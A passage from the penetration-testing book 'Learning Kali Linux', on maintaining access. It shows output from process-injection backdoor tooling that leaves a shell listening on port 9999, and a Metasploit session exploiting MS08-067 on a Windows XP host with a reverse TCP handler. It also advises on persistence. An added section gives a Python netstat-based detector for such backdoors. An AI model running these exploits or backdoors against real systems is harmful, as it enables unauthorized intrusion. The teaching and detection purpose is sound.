Learning Kali Linux





Maintaining Access | 199


 register info:
-----------------------------------------------------------
eax value: 0xfffffdfe ebx value: 0x0
esp value: 0xbfb15e30 eip value: 0xb7fe2410
------------------------------------------------------------
[+] new esp: 0xbfb15e2c
[+] payload preamble: fork
[+] injecting code into 0xb7fe3000
[+] copy general purpose registers
[+] detaching from 5196
[+] infected!!!
netstat -atunp | grep 9999
tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN 7268/apache2
tcp 0 0 192.168.86.47:9999 192.168.86.30:34028 ESTABLISHED 7269/sh
We now have a backdoor. The problem with this, though, is that we’ve only infected
the running process. If the process were killed and restarted, our backdoor would be
lost, and the same is true if the system gets rebooted. This is one way to create a
backdoor, but don’t expect it to be permanent. You’ll want to make sure you have
something else in place long-term.
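Because the injected listener lives inside an existing process, the netstat output above is also what a defender sees: apache2 listening on a port it is not configured for, and a shell holding an established connection. The following added example (not from the book) flags both patterns in netstat -atunp output; the baseline of expected ports, the shell list, and the sample lines are assumptions constructed for illustration.

```python
import re

# Constructed sample, modeled on the netstat -atunp output shown above,
# plus one ordinary listener for contrast.
SAMPLE = """\
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 5196/apache2
tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN 7268/apache2
tcp 0 0 192.168.86.47:9999 192.168.86.30:34028 ESTABLISHED 7269/sh
"""

# Assumed baseline: ports each daemon is expected to listen on (site-specific).
EXPECTED_LISTENERS = {"apache2": {80, 443}, "sshd": {22}}
# Interpreters that should not normally own a network socket.
SHELLS = {"sh", "bash", "dash", "zsh"}

LINE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+"
    r"(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?:(?P<state>[A-Z_0-9]+)\s+)?"   # UDP rows have no state column
    r"(?P<pid>\d+)/(?P<prog>\S+)"
)

def parse(text):
    """Yield one dict per socket line that carries a PID/program column."""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        row["port"] = int(row["local"].rsplit(":", 1)[1])
        row["pid"] = int(row["pid"])
        yield row

def findings(text, expected=EXPECTED_LISTENERS, shells=SHELLS):
    """Return (pid, program, reason) tuples for sockets that break the baseline."""
    out = []
    for r in parse(text):
        if (r["state"] == "LISTEN" and r["prog"] in expected
                and r["port"] not in expected[r["prog"]]):
            out.append((r["pid"], r["prog"], f"unexpected listener on port {r['port']}"))
        elif r["prog"] in shells:
            out.append((r["pid"], r["prog"], f"shell owns socket {r['local']} <-> {r['remote']}"))
    return out

if __name__ == "__main__":
    for pid, prog, reason in findings(SAMPLE):
        print(f"pid {pid} ({prog}): {reason}")
```

The PID/program column is populated only when netstat runs with sufficient privileges, so the check should be fed output collected as root.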
If the system you have compromised is a Windows system, you can use one of the
post-exploitation modules available. Once you have a Meterpreter shell open to your
Windows target, you can use the persistence module to create a more permanent way
of accessing the system whenever you want to. Again, this module is available only if
you have compromised a Windows host. No corresponding modules are available for
Linux or macOS systems. To demonstrate this, we’re going to use an old Windows XP
system. We’ll use a vulnerability that was reliable for a long time, even on newer
systems than those running XP. This is the vulnerability announced in the Microsoft
advisory MS08-067. You can see the compromise in Example 6-22.
Example 6-22. Compromise using MS08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.86.57
RHOST => 192.168.86.57
msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.86.30:4444
[*] 192.168.86.57:445 - Automatically detecting the target...
[*] 192.168.86.57:445 - Fingerprint: Windows XP - Service Pack 2 - lang:Unknown
[*] 192.168.86.57:445 - We could not detect the language pack, defaulting to English
[*] 192.168.86.57:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.86.57:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 192.168.86.57
